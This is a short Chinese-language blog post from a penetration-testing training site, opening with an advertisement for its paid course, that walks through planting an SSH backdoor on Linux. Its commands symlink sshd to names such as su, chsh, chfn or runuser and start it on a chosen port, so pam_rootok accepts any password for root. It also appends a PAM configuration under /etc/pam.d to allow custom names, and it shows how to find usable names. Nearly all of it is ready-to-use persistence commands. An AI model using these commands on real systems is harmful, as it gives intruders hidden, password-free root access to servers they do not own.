ssh 软连接后门使用
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
通过软连接建立一个ssh后门:
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下:
ssh root@xxx.xxx.xxx.xxx -p 12345
注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root
上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字:
echo " #%PAM-1.0 auth sufficient pam_rootok.so auth include system-auth account include system-auth password include system-auth session include system-auth " >> /etc/pam.d/xxxxxx
之后再开启端口监听,用于登录
ln -sf /usr/sbin/sshd /tmp/xxxxxx;/tmp/xxxxxx -oPort=12345
当然,也可以使用其他软连接名字,但是文件必须得在/etc/pam.d 目录下存在。在/etc/pam.d目录下执行:
find ./ |xargs grep "pam_rootok"
出现如下内容,则说明以下的名字皆可以作为软连接名称
./config-util:auth sufficient pam_rootok.so
./chfn:auth sufficient pam_rootok.so
./chsh:auth sufficient pam_rootok.so
./runuser:auth sufficient pam_rootok.so
./su:auth sufficient pam_rootok.so
./xxxxxx:auth sufficient pam_rootok.so
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=23333 ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=23334 ln -sf /usr/sbin/sshd /tmp/runuser;/tmp/runuser -oPort=23335 ....
登录方式同上
End
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3224.html